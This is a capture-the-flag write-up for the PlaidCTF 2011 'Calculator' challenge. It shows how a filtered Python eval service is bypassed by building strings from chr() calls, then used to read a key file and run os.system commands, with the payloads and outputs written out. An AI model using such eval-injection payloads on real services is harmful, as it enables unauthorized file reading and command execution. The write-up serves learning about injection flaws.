PlaidCTF 2011 #24 – Calculator (200)

Category: pwnables

AED’s summer internship program is notorious for attracting terrible programmers.
They’ve resorted to giving them some of the simplest projects to work on.
We expect this service that the latest ‘All-Star’ intern worked on all summer is no where near secure.

nc a9.amalgamated.biz 60124

Summary: python eval with some filtering

First, I tried many things to inject in input, like ; ' " `, etc. But it failed. Eventually, I tried logical operations:

Calculating: 0 or 10
Equals: 10

Then, it’s easy to guess that it maybe eval. Let’s check:
Calculating: chr(0x41)
Equals: A

Ok. We can encode any strings with chr(). We can simply read the key:

>>> def encode(s):
...     return "chr(" + ")+chr(".join(map(str, map(ord, s))) + ")"
>>> encode("/home/calculator/key")

Calculating: list(open(chr(47)+chr(104)+chr(111)+chr(109)+chr(101)+chr(47)+chr(99)+chr(97)+chr(108)+chr(99)+chr(117)+chr(108)+chr(97)+chr(116)+chr(111)+chr(114)+chr(47)+chr(107)+chr(101)+chr(121)))
Equals: ['Y0_dawg,_I_he4rd_you_l1ke_EvA1\n']

Notice: list(open(…)) is equal to open(…).readlines()

Or you can run arbitrary commands:

>>> encode("__import__('os').system('id')")

Calculating: eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(105)+chr(100)+chr(39)+chr(41))
uid=1006(calculator) gid=1007(calculator) groups=1007(calculator)

The flag: Y0_dawg,_I_he4rd_you_l1ke_EvA1

PS: you can download source here

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>